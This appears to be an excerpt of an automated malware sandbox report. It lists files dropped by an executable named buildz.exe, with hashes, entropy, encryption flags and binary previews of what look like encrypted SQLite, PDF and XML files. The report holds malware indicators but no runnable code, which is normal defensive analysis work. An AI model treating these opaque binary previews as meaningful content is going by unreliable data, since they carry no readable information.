                        SHA-256:D065205A3A23F55BF61FD9642D615C8E0539D1FB476C8B60AC41A6086C39AE30
                        SHA-512:48EA9A3582F7E4CFBD20E83A53570BAF08903797D8EFB5B240AB428B8065618FEE9DD1053C90B48B268B5030346E7728CF960DB8DCEC24F956049A830589DE65
                        Malicious:true
                        Preview:..-..#.L.M.9.n.....R.r....&.&....?Bq....K..8./........h....H:...+..-..5...o.m.D.kY...LMt.k...:ly...a.w........Sfv.Ox@x..M'V.U.. ....Y.4O..-@.......=-.P.&<.G+DM.tn....>......=.QF..R..O..{z.+.(>w.X./.....?...m.P._..JG.5..zyK....x..g..J.rgKx.{.qo1[.R&.~#r...zR.=._B..._...V........&....3.70t/....z&2.Yyu.k[.o....<..I"....]c...~.su..0f..U...D+.%5.f....Q.(^....N.F..Z:......Puf.....<.....HZ...O...9............*..wj..8...:.....p.....H......x.....K)}4<..I.7?y......<6B.i.A.zP...R.._....1..n..<.Z...D..o..V.`.....E.O......6..T:.|...D-h.O.6...h<..VE.A.@...X./xg......v.}...U$.B9Z...R...8..=.>..7.i..D4&.#.*8..,,o......$...2.......0M..9[.8..S..J.%9t..<.. 0..3..sj............+..i.R......[o...xbz.!.*..0...eG.@A...hK?8l..9.}^.....j*<.j..+J......K.......;.=e.H'..S.3?,.s...1{.q.W.`.l5-w.......o..........%.e`...]U.V..$.4.c.@.n'.......|2../.~...(t.Q,^...QrL[f.....k.7.x5...2>...V5C..*2....h.t..C..2..C._6..E.M".L.......V'.m..9.dk.......Y...DW.@%N.N.......l.kx...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.996108300828638
                        Encrypted:true
                        SSDEEP:768:kmeBlq3IbzwRweRQOBqT1O0fzUcr4tLt2PwseiFsG6YmaM3/4ODJnM0g9nDIPZA:iq3Ibz2mOi9et2Pkmpmp4ODp09nDIPZA
                        MD5:B8F4CCAD917AEAA417428E68FAFCB647
                        SHA1:CF10E0F322B3F727098821CAAE9DD286CC25D5F4
                        SHA-256:38C21D31B696EF9B566AB0AB70E191027941F73CF83033503D80951FD192D572
                        SHA-512:FD420203AEC9DBFA4D945B57E5954F15F916D3546A48834F05C83F3D3EBEABE5D1C9FE5E37A8578FE841D5AD77D013209EFBBA0E720E84CE6475185D1B051BC5
                        Malicious:true
                        Preview:SQLit..D..h....\..4n.lB..+e...!....@.......6..W+.{.^.2@1..U.a....V.ja....sWRO.P...|...lc.\oqI.z.o*C..!...n...(..D..H...h....g...|..N....&AA..H...v.dr%_..\<p.....W7........9B..6=.h.(....Db.Y..{K.x8f.H...w.1NE...7.[Z....=..s..d.I..+...7p.../.....F}Z8.gX=.y\..........P`R...u1G.f...^s\..m'/.jx.].:pE..3;RQ.u...g...M..&c....F..f.h.! ..._......;.{.]G*]..w8G....._.^..U..gt?Z....-c./.Z..M.2,......K......n....'Q..FL.Z.L.r...n.....z%.[.H....f.:E..4t.q.....i.vP?.........h......cD............#M.R...6..u.G:.K..Ei....=....y.U@....Z......Z.m`..a@..H.sZ....nZ...-4.T..F1....VSI.....7...~../D.l.=....E/.....J...........]~./..'......KM......ae.]&..g.?.._..u..$5..tC8e ..E.i..0i....<........k.+...(kR....)).s.....qv6u......k.*tr..p.i@e5.....V..h=.^14o..).j....xKs...........a...`..F..M...S.S.`..Nm.....#.. -....n....kO..ZY.m..|.z....U..o.;....E.,..K....[`......r.....G.-..n.@...R..w.Uoo.f.2*..-.)...V._G.e.Ht"r../8.t...'.."VEm}.*......v...%.^.Lv.....b`/.g...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.9951589997831665
                        Encrypted:true
                        SSDEEP:768:6qMKrqlS/mYxps8hGAD5Gy+sBoQxJY8lRSH9EBpWK2I5gR4mF+zX1kA:BMK6iJGy+sBPYo+92WKlgR4JzXeA
                        MD5:6772825A857E75932CA53E42481EFB40
                        SHA1:6AE9F85CB9D26D45DAA7CAAD00E01E499B8D1807
                        SHA-256:F07FBD39E151F6777094BDDFC17687FD6486A5BE2FCE08B2378785B0E03F177D
                        SHA-512:5A93D44E4A4E6DCDB42C4805E7296A963286A97CEB88816479E7BFEFB8E91653A9272B2FEAC45B6281296F07A33E9C0682676827A07D4192721B23287A3A184C
                        Malicious:true
                        Preview:..-...?..r).K/...{9..B...!.*.....G1.8...oI3.H...f.CK...M....YP...."..P..u..S...+.5.L...L.P*..?..J_..N.Kq.J5.L_......39.2..o...>.......wKt..f.=L\APRQ..X.Cc9.N'4NQ.<.?wV..\.....}5xq0...Ku..].2s.N.h.....YC....1n.,7..f..D....v....!q..\m....M.p..J..\.....xh.&.J...L..WfQ...>.H.E7.Gz2j.Y.[~8.g..8.'v..8..Y"u.7............5.6....K0............8.q.*..H.<Y.AsRO).A]3J.a....i...Q.Q...=..{.O..Bg......f. ...h.c<...@....&.{..R..s..Q{.F..9.. P...\t...z.U.....v.C!\*,uW+.......Tc..s.9... .....X....o.x.KY&...X.g........{..a.lP..i..[.."..zi.FlU..') ..R.M\.|W..~..n..6.a.1.=...r."P.p...=.c.z....I..A:...*I....i..it.tc..[....p.5[-V..........G&j..A~.~^.^...k(..e=..?}.]....k....%pvk.Q/`N:).....>.....4nc..............._..@.>...$Y#.G.C.Ig...0....&x...F.)F.. ..bB`.....]As\.K.h^........gj....GC...... .Sg-.U.hF..7.....~B.I..I...R....w....(.#|.=K..U.!..]..n.p..<OO...f....U@p..E..q...E.U.....?E.....1...e.y...^kn.!..=.*.....M..!.X.3.......dX..)...%*.Ui..z..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.996190920793639
                        Encrypted:true
                        SSDEEP:1536:ZgjJAfRPQjL1xuCxVES+IzD4maYLlzbx8+A:ZgtKRYuCYS+IaYLVbx8+A
                        MD5:301EC77F67A28C4CD9CED07D0FC12067
                        SHA1:1AD22F4F0D752C0699D28BB52AAE21CEEE1039FE
                        SHA-256:5EFBFB74FE9CBE21C6CA308A6C0A0AEC22339C302654B5BD2889370EA33DC9D1
                        SHA-512:878232B565B726EAC10E20ED74F21D3BA7B7CB03C3C479BF61B199296E050F70E59F47D28E20F58B9A861CE615F854356B42B95D010AC0AB9D70654B479788AB
                        Malicious:true
                        Preview:SQLit.02.*.b.&....=.>.h.~.....1.. >......iH@..Z.F;W.N.-%..Y.*.m...+o6.....0..\..>.j.].|.?..T...>..=d.....0...8.}WT.../r..En.4.~I-.......r^2&..b'.=:....X%)b..DN6.>u....Gc..s.../.1..o....^......r.1......%..6"....\.....:.?%~..gM....0\..O.H....7G.. ..G.,....y.=5....9...{[.<.sX.G.?.Q.......3..)..;Vq.X...f..e.$ O...0.."...$0......j)....,.UU8..^.h..7.hN!!=.x...Z<HNr.......&..%b...<....~..|.bn`@..z...7%............-.9..z.^..FpF..N.....O.Bd-%...g#..\.l,X5.......;D....d.F....$...+.....PV.(...+.#....1[...W..J"~4JZ..^(o./....O.?..e......mne..../d.>Y..;P7..#x.|M\...7ea.<..D.S.`L...#rv..1Ov.E...#O.&.y.4.7j..t....v...O..C...15x.WY.M.v...$..9(.>;....xl.m<c.d..)#.c%9Y...-..Z.6.Y..jC:..;.....zg.r......&.".A.B....~:.X......S..E(^.'..>Z%.x..n`sRg...8+....a4.2^=....w(..P-.d..[.f.1@|Iv..1....Vs....V....$.U.H........pj.u.8.....6\..!...YE..(..oa..w..No.....7.~.4.=..^S.s..$..g.Q.n>...[=.g.......S57...]#...q.8;-...p..&.....In...eO.ji;.@.M.!.....p.|v~..c.>O...#..(I:Y.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.994537211120043
                        Encrypted:true
                        SSDEEP:768:lRSHmlOGqs4dmrugrYVdMkHoRcm89+6T7AWg2A:TSHMclmqEwztJ93AZ2A
                        MD5:475864397DF8A04DE26E1996314FC570
                        SHA1:B00E56C299451BF49F6834F18B4939FFE03EB1D6
                        SHA-256:8F18369C3B81837359FC10B1A2E3249B02781FBF79735EA06B893DAF63409EA0
                        SHA-512:04AF782531D110070F0008FFD5445DF1F6C26AFCCCE255CA813C12CF31213C4853A7580622C35C041A02FDA84BEF915DB136E85D36ABF6B2AFD411E3FCB078B7
                        Malicious:true
                        Preview:..-...=..8....[.Z.;......YcE.>..t2.1../uU..8y....K.0.A....e...=&...."._.7..^.1.0!..C....g..U3Ej!l...=....^......w.j|..t`M.=....n.Q..r.......W...3......<.6....*.hI....dT!......e..v..d.j..n..77K}.k...*.._...a/.})}8..}!... ..+.~.c...i;p...S.~....8.a.i..fjQv..c.....GI)..8.."..../....C..5 ...(.cK.5...T.....@a\.:,....=.12z.f.u-.>...,o.%..\.H.M...<.-.%n...,`..k....[.Y!7..I..&.D!..#..J..C.Sl..).r....n.1./...=..q.kg)_ .du.fO.W.\H.....|@..g.../.I.B.../.\I4U...y.......u..... *.\.8.reEW.-k/...W.?..ya.N...zNg.R..`...k7.z$*X.R...[@\...Fe.0>.I.0.4.s...f.21,..tF1n.....$:X..m70x..e..J.5 _QP..@^B.i....Y.G.m.......h]......rB...*...%.3..-}.(.[.k.H....PGEM.....u`@W...W7.A.l.......<.M.*.%...u.7..zF...0@@. .{.FE.0r.t.W....9.=z....-....5ef...Z..S{....'.X2N...p.}.....f.....W2..A..[6j..I..r.Vs.HU....T....]$..:..W7.......0....7..........Q.9~.~G.*.f.s...W.o.w....j"....q..H.X7..sF.....}....a.*Q.....aO...^n.k.c...L..~%..+o.3.....w=..%R..B......%.*...,G......J..!....x.P].G
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.9961695811881
                        Encrypted:true
                        SSDEEP:768:cG3vwdf7euud5Q8YvwGsB5c76U2YNC8tPz4dGJ9LPbU1YitFyBWYA:cgwF7OdjY6i6U2YNPvHUTvyBWYA
                        MD5:3237D836C01242F646FD33A0824BBCBD
                        SHA1:0ADE0C9742DC3797E954C41A2D609B89E37D37BB
                        SHA-256:E2BDB1C28A63DC41DB2F3D91B3B2C3E2A1344C40F304375B41A819AB517284E8
                        SHA-512:B3564DC66F4F24DBE8382D8D1D9472ADF7C2E7025EAEB99463997493E3574D85584DE8F0489BFB1E632B529BF3EA13A0C93B74DB71D63EA9D38D36814BB2BF91
                        Malicious:true
                        Preview:SQLit..._Z....".k.vN6.{.1|1. e...5.PB......G.....zx.6...kj.GK...n..."R1_.+.y..M....msE...\.uh.^.../...$..7'....A..)...i{.63.0../..O..H"-....B....V.......O.K|u......KS.v..........?jJ....Z..../Y..x.;.n..U.BH......j...x...KI........=.uj.....7.Tk...+..xKwU...1...9{c.-..-%."....9=.*,......|m..........+Y..9=.x.o....E.j.8$......?.?....*..v.v^.+.d..b.^.doX!]/??.(..A.W_=..W...p8...rC..L..Db..:<....`.{.....8...M....8AWW.xa.o<.Rx.....j.F...t.~...ez.$Kegx..K...8.q......@.b.<...Ta6.4;t..S...5....Y.Q...~..h.r...7S@......"f.....).t.wq.;8#6a..&.q........@.?.5.1..SqG..LVyf.8.4^......S".....4.n./.j\....G..SAdg..............U...h.!....:...^..v$..B>....Q..e?.|.c.z.zS.[.._.*...p..A.N..Xr.r..7..i..+.A....g.>=.B>.Q.9...g.\..M.Y....:..[.r.U*.....]..Z.<...2..L.).PW.3.!D.....d)o..O.'.K3lz.g1.dAA>;......./....0~,...?.GH7...m.[...DP.....}rAg.G....F. U9..f.B.{...q@.r..c."..As._..i.u......p..2.Z\OOG.2..x.}.....]TT..@h......M..zrY.|............K.bz.....Y.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.994739021216727
                        Encrypted:true
                        SSDEEP:768:yZ/EiDWQ0dcQ8wEEGJJ6iFT/QAJbvDBPap3ZIBGkA:yZ/rWHdu7v6M/QUbrBCgA
                        MD5:604DEBAF2D2BE014E236EDBED4C3CA75
                        SHA1:13B26684B208E0162A26FB17440910734B9FF8E1
                        SHA-256:57106DF3EE6368FAF6A8DCB12E6B0601F04C426C7E753118BBC3947B4B4529A4
                        SHA-512:F60C07550CBD286D6102BEEC44CE787A70CC256F8EA16953203426EBCEE3133EF1561226B95BAA705F777F466F3D5AAB5C5ED6364DE71D53405AE98011C0C9BF
                        Malicious:true
                        Preview:..-...A..Gz1\..2.p..i....'L.6..k........GJ..?.=........kys.P.Pd1..O.&S..N).v.s..?o...'ZS....T.......R.Q9m....|.}..............Q.y.....k.....jU.+..X.....;....:.a..Pk.....I..E.0].l..kA.k.~....uB.lH..T`~.*....:.G.... .U."q..Z....Z....w.C.I...j...V4..!.f.%...y.....5.1o........a..$....ED.b...;.......-.....bmZ...E.f.'q?...F....j....F-.*:.J...fi..r..z......K.UoaG.4M.9..A..%..~.i...../^.`eh`+.{..O.xb.i.F.@....R..^..W.^.44.P...L..;.?..4.d..aX.\ip:.8*j....V...7`C7j.K1.7..A....L....=@.........G8...Y.a!Ym.*...C....(...:u.._a}.<.[.h<..Cz....1j0...........(bu.E...........w..b76..2....Q......L_.PIQ.S......XNU.g.. ..rtV.k....U.!......n:...j..S.B}..h.....D;Q...m..Q.~i.y.2........Q..'.j.U>..]X]5G...p..1.........]Zk..+....I.-.9.ots.O...lB..yYa.O.i..H...PU..{.Vr5eJ......p^...G....F......xS. ..,..a.g.".A....R^.=<......}I6.....X.D5=..<#;:!.i.1a5G'g..-..M.....C.[..>...,.b...X.!G....{.h......P|K.5........H.M[|..bCW.}jW..P..1^......4..l...... ...-<.Q
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.996308183804707
                        Encrypted:true
                        SSDEEP:1536:rc1WSWz4pnpy8H5mMjUbtk5DsVGJpYc8wHapY6SA:rc1WbAn1bUW5owDFNA
                        MD5:FB771805C5E4654157B95C37AF6EB6B9
                        SHA1:E852A9A7AF589ADB11B5AAE3FA84CA32CEB15AB8
                        SHA-256:50F45EE12453524F452E41AC2EABA1BE649015D7C9FFF1CBB885C8072D5E90BA
                        SHA-512:F9779D059C49751F5486EE7052423A5C442E9A896453AD4F0B1FFE1683D3AB19DF18A60781415C55084E0C9A050A6111D0377EB31B1C11D8B9B4B7722831CBC0
                        Malicious:true
                        Preview:SQLit.F...`.\Z....g..V.7z...O?.Dt....,..S.b'zaP...m./.bj.Z.TO....We$u(..$Y(Hr..r..@..dy.......G.UbZ>@.Fh.k..],.MY....r...p......v#mi.~...N^.....h..`.u~..&CU..........d.......t........_.{.@...i....?$.*^w...YR...31.....<.../.....B....h..q.(..h...s... .PtID.....z>....,L..=.w[ .{....(.E..x9.+....=.d7]....q(...;ZU.o..M..7sH.1H....<.0............|.^.H#..)..'}.....y .W@...,K.\.S.(@.,.s`.R.l..Me.\.P*...&.....~.R.............[.5..;.d..>..:.x..|<.....Q..._"..>......ki'...2[..S1.4..)96.J.D...lb`<....RpOv...v..X....&_..e<.u..;..:.9..p..n....:YV2...f.a.~. c...{..B.....mC..|.....4Lz......q..6]...m.)... .n..d.{....;.TN..k...H.S...Rb......8.._...."+._3...P...x...{..".`YL~lm@<H;jT*2.o.r}..H........t,.<k....-#.V........:..{.$M...."..... w.;.2)..w.Vt.%...~..Gj...zvd.6.....^....2.........<&..3..N,[[w#...y.f;....V..Z.<....PRA..k.......s_...L..O'J._R..@....0.b...o.r...W....=/Y..U....a..d..m...4.".aU...gs...*.jg.F.z........T... ..)..'.).w,....?..yX.$....4..#'1..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.994830661965368
                        Encrypted:true
                        SSDEEP:768:Owuv7ZsKbYASb2ooTXcKHbKdxgE6GzdJxTF31uBSlA:OwuvtxTXcK7AaEfzdbJblA
                        MD5:492311770792C65E222F51119D21F307
                        SHA1:15B5F44B7509A4E2EE37B8A89308A943EBE1120E
                        SHA-256:C6340BB449E92888141CA44830FCFCF2586D9E0BAFAD0CA597C21D8E9CC12519
                        SHA-512:4D21F259902F57A87D5266E4E4CA9E36A484AE3AE829B24FF5965E73BB59D5B8E5B60FD446751F2D9785DB11B748FEB3433A59C573D9AB3DED0D9D167F098CC0
                        Malicious:true
                        Preview:..-.......os..(!#mHn......Re..'C...Z.....J..J.H.m.....".O!...,".\.2..N.x^!..r5l.....t.~....U3.+.P|L.).,.......i.8jR..5...VCV)..?w.....%w.+.......;|#XR...M...pa.:....".....:lQ:.a...=3..../.m.....Z...?..P....f.;.T.].F.o..O......+.XreT..Q..k(...tG;..m...x%t..MN.m....+p..q.ge{C$G!Cg.*...... .|.#.\.....-..LC....Z..oq.L....{V!S.a.|TA.........G.^.|.U;....h..&......f.5..B.1..i_g.v.3....$..a..*:...91....j....L....@..W.X^..6".X...P......'....<y[..bV.4....z-....<}..`.......>.d..p.J ...b.?(...49s.b..8..z+ D.[.l7M.Z.i..|.[..[......$g.w..Y.\.{.....}..E...~1.}N.c.<...n...~. ...I.?."I.7hwgBk.....q.....P8*s&.+..9.....#...d...W.g.Bl..\.d..].>H....J5A.. R.<...4.._...wi:)..Qq.!..V..F....l.<A.....sb4....%.gp.:uVCNL.......u..!5..._.........m382.D...B..H.;...n.m-....e~.....<..,~..j..K&......+.^.]7.U....m.jr...0Z.....n..W...~.........i:..yl..4..G.%.q.....On....VH..&...q.......<.IF..?..;.....(.?.....r..CWd..6...^...*../k.Z..2Uz..PXdB*.Nw..%
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):573774
                        Entropy (8bit):5.735068342347781
                        Encrypted:false
                        SSDEEP:6144:+XtFoEFg7kAq7kZbGzJ2p9wEwM52tFZO+fqaDRrh/o7g:mDyLq7TO9wEwMAHZOraDXgg
                        MD5:D5429658E651D9E93EB5092356B49E34
                        SHA1:6F6394D6888D914DE6F8A3ADB39C53C31C395AC9
                        SHA-256:CC979A166C8ECC1F4BF072304E07041C07756C5ACA6903A3CF6FC7AFB5CBF575
                        SHA-512:859EDFEDBE5A2C0FF0EC18A1BBB9F9CADA6BF85F11740C0BED9704D66319D9555D0E45573E3BC40320764023B7081CA3A82C437381A5B9E37403FFDFDA5CF233
                        Malicious:true
                        Preview:SQLitC..m...Wt..G.&.@....p.y.....:.......)AGJCv..t..OZ.c[f#c.4...8....[j..`..6X.....=5A.b..@....d.3..Y.n.b........_P..."..zQ4S_..`.7-{..........;TT..+K...$...-[..<-......"....*..S..Z.N.!..Ko$.S/..X:[9...C....S.."@.....1B,.m7...~...........st...O~...Z.C.S..c....pq..V+......1..."........<..3...5....<....h..R...i\9..M\...j.....:...X.@...>$I^........Y|.kL`S*??&.e.#...I.I*...Z>..PsK.;..K..c.1.m.M..6...J.M;..j....x.f!.=.o.&d...+.\a|...#..8.(.*&+...........+.O.2a.2...]h....h)..l.}......2HHf............&H.Zk*~..h/..RLJ6.Z..Z.....YH.(N........iF..T.0...3..1..B.S.?.~.....k..g...".G.y.........Lp..LC.6..N..C..`...G..../.H......Y4'_.,....X.....Q...Y..O.....%j..$..Y....5qV.m%7.p.}..Y{b^..k|4. .2q...&.K\.6...*vX..&.k.)..K..7....I....j~.V....[...mk........t&..P.........%1.5....iB.v.m..."[Y......>WL...a..1Q;.(.G..0.}c...P.............|.\...h....V....,./1..=..u-.4...^G.I.Ld.e.3.....;.......?..!..3a.....&.r......6...i..6...k.up..qD..?<....+.c.......o*..\6..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.995723572702594
                        Encrypted:true
                        SSDEEP:768:1Bff2to8EvkDGGLXD/JyF/ZitH9G1pWlpt7ejX7t0/+xA:fff+xLT/mhitM1pWlpcXemxA
                        MD5:CC7A8D9F019AC10F3DFC41E78834E356
                        SHA1:6AD63ADF4BAFB0DCD84807DEF78BA0C47FD865E4
                        SHA-256:6B28C19A9A93B2B5D95104F7EBBF5E0A02032C5C95935D9F62996DA709057D31
                        SHA-512:1C49DDAAA3816D2DFD199B97B0C108E460B1852C44F40C5569482CAD780755C1EFF346462072D2C7CBA4770D49A58B6BE305E07A927247A738C1E17B2F4B7761
                        Malicious:true
                        Preview:..-.....J.T.6.y.<f.J......)...|\>.o..D|.....s.].K..C>D....'T/.Y...w....h3.|.va.+]q..~.;..r............*...M..6<...O/...?,..o\w..zt.H./...n...#.O.<I3---.$H.:V.Z.#..K..@a.....`.i6c.....>....s...nG..0r....M....d...%)..G.U.../S....IV..Xy6.....C.".....2.=m[.&9.m..k.v.rS..n.3.^.....C..{.H*.....E.5..L..m.b.m1.'.._.......:A.b._a&n..H..<....X...k$.M.........v.5yQ......Y.c\....V.AQb..T..z(..d.V.A.F).~.a....@o..|.-.b..*.}......_..kf.k...+])........$..`.2pU.,.+..2.p+.oT...p/.r'8Q..v......./ 5..9..t.L.nQ.k.._..h.H.x..8.n........[......CS./.m....6v../,2g. ........j.;f........9o.@Er&y..m(.p...e#.....-.s.. ....&..5..o..Q.^j.y..r.{....t......$WR..N/.....CU....n..........&.....ce%2....$.X.....`<.....\.^.PI........B"Y.O.h.....V..$7..}9..........t.:.V...Z AY...p..H..n.Y.q..k#.....QF....../...d.}..._k9....2f.s.gbu4.T....3...2Y.1f}...a.O.$c.a..X.I..x.*....Y..!........S.<.(5.s.Bu.Dt.y...~9~O.....{.....:..6..K.Dt...p.e.z.(.....d..:.03.=vlk.-T..G.G}>.Nqh}..ut
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):370
                        Entropy (8bit):7.339353749546556
                        Encrypted:false
                        SSDEEP:6:0+BHD5eOJgxEFcKgDrRybliZSI49lLJdMaZEPHLFiHBqheA/Mr8FGcii96Z:N5e+gxgV4VZHIJdrhH8h3/26Gcii9a
                        MD5:B5B4D430B6984E06DA274EF56F19DC80
                        SHA1:6CBC1249AEE358A6C6DE927EECA9ABBA006DC773
                        SHA-256:2F356576E1B2C1B955CA550D47A6451CE6149BB8F1D445C7EA1D2C56B07166A1
                        SHA-512:3F7225FE864C3442B8103E12CF3C6A425E3AAA6FA295EB7B12FC026D595945433A0511FE49896388494CD0D64BE4215FB1B20C0A0F17005EAC6344A0D780137E
                        Malicious:false
                        Preview:%PDFT:..\....D9..?.O.n....,..B.u.1.{...7R....T^.8l.3n...Q...EPw..J."...w....7..?.....DK'Z.<\Y....&.=.......1|&s.t.q....].<.....\<a...xO&l..][..&.A...Q...]..&...8..H....S....)&.B.K..uYEkO.L.gv....~i.....i.+w#~;|..Y..b...8.D......!wn...U...s..@..!.@......"*.V..z...v...9.jW..>EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):388
                        Entropy (8bit):7.297117780939892
                        Encrypted:false
                        SSDEEP:6:71xmBXWTSI/SN73EXTwccVo13aa+4ItMXVPsBiRiKL8wVKoFzqlprV1/Mr8FGciD:n2XNI63xVMFkrWPapf26Gcii9a
                        MD5:D96F4964FCEA6940CD2F690C5982D607
                        SHA1:171043B822F8C62BB9B9CD88A781383A68971269
                        SHA-256:795C256F9FBE1726B5127A6448A8D9A48F2F18F1BCD47E41BA65075DFF73F604
                        SHA-512:D4BBF2E666075AC0CCAD90C9623B23BA13C3EAA8FD625F17A55E333EA34751EC00096C1A67B82B97189D13D4ED48C3BD7CDC6CECF3B8F38D06A61340CEF6831E
                        Malicious:false
                        Preview:%PDFT..Cg....0...R....vF..6...g.[.....f.!x.B.#6.x.......)...Iu7c.%U....+v.h.../.0...._kt....%.+.p..4.K...8n.P.B.fU.......d.,.A.({..6`_.C8.v..+ez..k..x!......#....:...m".....KC.d........-yp....F...d2..W...K..l.mml....eD>.9.Z.s..a....Y.B..IYbC.;.....6.-.<UT. ..qqG..9..G./..$F".aD...#[.v.R.\...)...KEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1352
                        Entropy (8bit):7.8275431091947905
                        Encrypted:false
                        SSDEEP:24:d6QALabZfF6cZiS8ZuakyotiF4aErjaut37Z++afY12FeGbD:d6Q6oZ7N8PfotiF4drR37ZxafY124UD
                        MD5:86D1F2B6BD7FE9B754DB31D473E52C2E
                        SHA1:2F4138E475C29C1B86A596EBD1DDE134F14A4B35
                        SHA-256:8902C4B7AFD00E319A2B4695398D51477E55BD8C6DF23E32008EE69FE5841F2F
                        SHA-512:6A980132DAD1595B2E8C156CC879ECD098D50A3F7A2FECE29E748D92A0674546A3FD3CC71E9C5AE434487A6B25E63FAFCC3A46D7762910FD5B08D9B77F7403A4
                        Malicious:false
                        Preview:<?xmlj.........#..C........pp.vSf.n..g.^.,........x9.S.Y...G...`.{9.N..e."g].a.D.f..k.x....C...=.a.Z..i.....L)..<.(l...(s@...@ENT...@.H..............X3ab...De......r!x.1.e.S...y...x/..a...q;./.Us.y.o..r^...F..p.%.(.......n..i....G...."/}..n..mf..>T....^....BD....@.ap9......)&.r..j.....h...k.%.^~.<ug......S!.....ko.Z..>S....S..HTt.....;+\..8...7..S..bg.L....d..A...`K.f...CS..^..eK.a~3...}...T..6.5...;..G*...o.....&.r. .gyb._.......D.Tb&../.f/.vF&.|..PW.:;...A?n......m..O...T.(..z.;.....W/.fi.I...........:.AI.P..%..*...d...[@l.$....&f.It....:[\.\I.of$h.!t7..r..0.WF+R..Xw..r.......r.J.6.n.."h....~.Q...S.......-.El....n)f0K.......h.....o.......x.....(..5<........W.1.$.%.2...........hU.....yz..n5....OT..s..E;k..53......-...LI6...f...i.[...L.G.~.)...c...9....#Kb.e."..C.r...tMZh %...u...<..po/.Ji.+.....,.[...ZS.w.Zz.}....^.!.P.......Z&..?./'...o.R....-.M.$o.w._.;...N...V..S......7Zal$....h.B....J.....T....?.%i..s..>.........C.w.Z.u..t6.f.$6Pe....^N.{.l
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2430
                        Entropy (8bit):7.922632517606201
                        Encrypted:false
                        SSDEEP:48:pjykEthFR1oJtftTyPCWfnV5b0TNUGNlyUYQ+dmiOpkFYlOPFhjmfh0qUD:pwjR+PAVZiNeQ+dIpqjWhA
                        MD5:72A9263BC637CB5042B86A2459520496
                        SHA1:CEADEACC9ABEBD96175FF8AA62B9758904F1E2EF
                        SHA-256:B149A14A7102B671C4CD6DAE990DD13512C7072707BF1E737DBEB68308F0835F
                        SHA-512:883291197AB357694BDC19D2D2654478F9FC55B6CBFE2A299D1537C9339DF39FA59606765BFACDB0F496DC61A75831DCAECF9579D2C6EEEEC8368C7988BB7F6C
                        Malicious:false
                        Preview:<?xmlU.'R..........B....2*~....H..S.X.....5n...~...x.-.N...[I..I.4.3.2.\.n..'..s3..ld......2.h.@..f.]E|..m...eE....3p...K.{I,]..c..i.l.F.......:.x..x....^.d=.4x~...A..rU.2x..[...W.......c8"q...UT.......NI.9/.?.....S>N...@...dq.4c.0......hM.3NPF,.......ur....G,...>....$.MF.kR.t..#..[7[....W7..F.ev.GV..f..Y..h..p.>....@.|....b....K...h..we..{.%.W...W.-*.3gD..<...S.=[.;.&.C..cf..L`...}.ZT0MAb.b...B..g...>....*.C;.gu....%..X..p.(..I.w(F).....t.b.''.>....C>...x../..$..<[.nj$l]aS`...zOb...$...tixo.....S..}&7?........qX....t.a.%.d..{nm.s..a.4.i..=..8Xk....d.D.M.+.....~.: ..pS3..>b\...Ih..3.6...DlL.1'.1.h.'7.c.Z`..T...S..SL...\.S.2..EJU.jb| .N.4.:|..kQ.Z!......c..7..{...T.V...)0....A.......TD..y..$..pY...........SQ8.A..o.!......!..UM.S.w..7.;..%_WYQ.:.@.O.\.<o..].. z&%....56..B%>.'.......a.~..=....*.6.d.O..[...N]d1d>.X..H..F....8..J/.<........$oL.p..?.].H~.....v.b..+Dl.$.m.<..i..U......(D..$..5.sN.Fzu.:..>........,.n.{...j..d.4...>........S..3...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2388
                        Entropy (8bit):7.912953596689455
                        Encrypted:false
                        SSDEEP:48:CaMsnCqDrOZ8iW1TJmdRLLHqqz3IJjFVOHybHMpyUD:C/QOZlYkSqYOHybayA
                        MD5:34C05C29FFEBCF309F00AEE7EEFE9D1B
                        SHA1:C8B4AAA2F1C242B8240E6865F29E23814867F488
                        SHA-256:44F2ACC73B76C37BA48E5C0F582D7E2C238E0E0E45347FAFBCAF819567A9EC88
                        SHA-512:E35EEA33C2259F58503CBEBE535205C60FB26261627AE0F0B93C973A73D3B8FBD7C9F583479A8F3EEA64463A46E2163D71294A0696AB40E8735765039D21676E
                        Malicious:false
